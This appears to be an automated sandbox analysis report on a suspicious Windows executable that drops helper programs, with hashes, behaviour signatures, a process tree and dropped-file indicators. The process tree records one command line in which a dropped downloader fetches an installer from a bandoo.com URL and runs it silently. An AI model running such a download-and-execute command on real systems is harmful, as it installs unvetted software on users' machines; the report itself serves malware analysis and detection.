Analysis

  • max time kernel
    149s
  • max time network
    155s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    20-07-2024 03:05

General

  • Target

    5ecb717d7022d2cd9d06a93d738fbc41_JaffaCakes118.exe

  • Size

    88KB

  • MD5

    5ecb717d7022d2cd9d06a93d738fbc41

  • SHA1

    9c4c982aeed6d0af922fcd0261f0c2a1fb36590c

  • SHA256

    91b8c7677ff6d15ed2b967c6c2fbd6860df58470f1e38ed971ba352ecb83aeb3

  • SHA512

    6bce562aca1308f7d36a701b481a60dbc528a266b22078ed8fceebeeb2167d4d88fbed4884f52e7df06e72f219d28add575ae28ebf1d83f201d7e25b38557cce

  • SSDEEP

    1536:3PsvTIyYxIrgpWEttc6oGvLeEYI9MjR0q4Qmm+6RnYe7QeHtRPQDt1xBFAu:wIDImntcjGvaEY1Lv+6JhjHtRYDtHcu

Score
7/10
upx

Malware Config

Signatures

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 8 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5ecb717d7022d2cd9d06a93d738fbc41_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\5ecb717d7022d2cd9d06a93d738fbc41_JaffaCakes118.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2904
    • C:\Users\Admin\AppData\Local\Temp\~nsu.tmp\wsget.exe
      "C:\Users\Admin\AppData\Local\Temp\~nsu.tmp\wsget.exe" "C:\Program Files (x86)\WhiteSmoke Translator"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2396
      • C:\Users\Admin\AppData\Local\Temp\~nsu.tmp\mosquito.exe
        "C:\Users\Admin\AppData\Local\Temp\~nsu.tmp\mosquito.exe" /url="http://download.bandoo.com/o/0/r/54/Fun4IMV6.exe" /args="/S"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:2416

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • \Users\Admin\AppData\Local\Temp\nsoF73C.tmp\inetc.dll

    Filesize

    23KB

    MD5

    9cb2213df57b7bcfaa8c4c5ec44edbf6

    SHA1

    2860d74feac2bb064134444ab985617d7244814b

    SHA256

    0003923bf90d38ff127d8fbcf76d5f90cc7988876b31b4d0229a9f7e87f36442

    SHA512

    fc4794790b18a989bda9bf62f6f05b95c9c31eef16272f39a28adf7becb281ecc53b169774361278df079e8a450f367fb2c848c9e229d66cef2aac1114387a39

  • \Users\Admin\AppData\Local\Temp\~nsu.tmp\mosquito.exe

    Filesize

    48KB

    MD5

    618b0d7853917125a1cf61a6aeced9f1

    SHA1

    b45b75eabe15e4e242a9574abca8eb265047df03

    SHA256

    b3be39d0b638c27385ab93e7b4e9d619890fca318d0ae772624ed60275562449

    SHA512

    d73da3f0c2ec512d041fdaf54bc9c4ebcb159a29b8e5e5929f3f222043d74033a060745362df6c9326d1ce744a66ed6219a6b240a86537b23b975926a91770eb

  • \Users\Admin\AppData\Local\Temp\~nsu.tmp\wsget.exe

    Filesize

    63KB

    MD5

    4e242f3fed95f44c04c71d7759baf64b

    SHA1

    d0b31815f7ba51d705ab02aa48614880edb3108e

    SHA256

    0045fb0e97ac43dc0f55bd153c298e2f52b107f19cc57fbd17e7cb09a77dc57d

    SHA512

    90b4024f7296dd49ed81a115861211de5ab3decc9ab61c4b18818f9ad324651f112eacf268a55174077a5f70744efa4c781ce34794c974a18c35eb0287ee20ba

  • memory/2396-13-0x0000000000370000-0x0000000000386000-memory.dmp

    Filesize

    88KB

  • memory/2904-0-0x0000000000400000-0x000000000042E000-memory.dmp

    Filesize

    184KB

  • memory/2904-12-0x00000000001C0000-0x00000000001D6000-memory.dmp

    Filesize

    88KB

  • memory/2904-11-0x00000000001C0000-0x00000000001D6000-memory.dmp

    Filesize

    88KB

  • memory/2904-16-0x0000000000400000-0x000000000042E000-memory.dmp

    Filesize

    184KB